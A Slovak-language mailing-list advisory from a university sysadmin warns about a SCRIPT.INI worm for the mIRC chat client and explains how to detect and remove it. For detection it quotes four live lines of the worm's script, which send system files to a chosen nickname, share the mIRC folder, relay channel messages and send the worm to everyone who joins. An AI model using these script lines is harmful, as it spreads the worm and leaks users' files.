warning: mIRC virus

[Matus Uhlar]

Zdravim

pre vsetkych ktori sa trosku zaujimaju o IRC, mIRC a virusy, ktori sefuju
ucebniam c PC a Windows kde ludia pouzivaju mIRC:

1. mIRC (ako aj ine klienty) dokazu na nejaku udalost na IRC reagovat
spustenim roznych prikazov. zoznam udalosti a reakcii na ne mozu byt ulozene
v roznych suboroch, standardny sa vola SCRIPT.INI.

2. mIRC (ako aj ine klienty) dokaze prenasat priamo subory, protokolom DCC
ktory je rozsirenim (medzi klientami) IRC protokolu. moze byt nastavene, aby
kazdu poziadavku na prenos suboru akceptovalo a stiahhhhlo si dany subor.

3. V poslenom case sa na internete objavil VIRUS SCRIPT.INI ktory je
nastaveny takto:
 a) ked je aktivny snazi sam seba poslat kazdemu kto sa priponi na kanal na
    ktorom je nositel tohoto virusu (preto si dovolujem nazvat ho oficialne
    virusom). Ak ma dana osoba nastavene automaticke prijatie suboru, subor
    prijime a pri dalsom spusteni mIRC sa stava akrtivnym (ak sa spusti z
    toho isteho adresara, co je dost pravdepodobne (mIRC sa casto spusta z
    adresara v ktorom je nainstalovane a casto sa spusta s nastavenym
    pracovnym adresarom ako je to vo windows bezne)
 b) ak sa vybrana osoba (zrejme autor) pripoji na kanal na ktorom je nositel
    virusu, virus sa pokusi poslat mu protokolom DCC niektore systemove
    subory. To ma za nasledok ohrozenie bezpecnosti pocitaca
 c) na niektore prikazy poslane cez IRC moze virus reagovat roznym sposobom,
    moze spustit rozne akcie na hostitelskom pocitaci.

4. ako sa proti nemu zabezpecit ?
 a) nastavit mIRC aby automaticky NEprijimalo subory ktore uzivatelovi
    niekto ponukne (moze to byt nebezpecne vobec... nezavisle na tomto
    viruse)
 b) upozornit uzivatelov na tento virus a nech neprijimaju ani rucne ziaden
    subor tohoto mena (SCRIPT.INI)
 c) akekolvek zakazovanie IRC alebo mIRC je hlupost a nema zmysel.

5. Ako virus spoznam ?
 - na disku, v pracovnom adresari mIRC alebo hocikde sa nachadza subor
   mIRC.ini (u mna ma 2048 B) ktory obsahuje riadky:

n4=ON 1:TEXT:*shirak*:#:/dcc send $nick c:\win95\system.cb
n5=ON 1:TEXT:*Durak*:#:/fserve $nick 1 c:\mirc

a/alebo

n10=ON 1:TEXT:*:#:/msg #x3212 ^? $+ $chan $+ ^? < $+ $nick $+ > $parms
n11=ON 1:JOIN:#:/dcc send $nick SCRIPT.INI

6. Ako sa proti nemu branit ?
 a) zmazat dany subor a restartnut mIRC
 b) vid bod 4.

Poslal som to do 3 konferencii ale prepacte mi, za 2 dni sa ten virus
objavil na mnohych miestach v okoli a je dobre aby ste vedeli ci ste
ohrozeni a ako :)


P.S. NEPOSIELAJTE tuto postu "kazdemu koho poznate"... nechcem aby sa tato
posta stala dalsim postovym virusom..

--
 Matus "fantomas" Uhlar, sysadmin of one server at SANET Kosice, Slovakia
 E-mail: Matus.Uhlar at tuke.sk ; WWW: http://ccsun.tuke.sk/users/uhlar
 And don't forget: I work for SANET, but talk for myself, dude... ;-)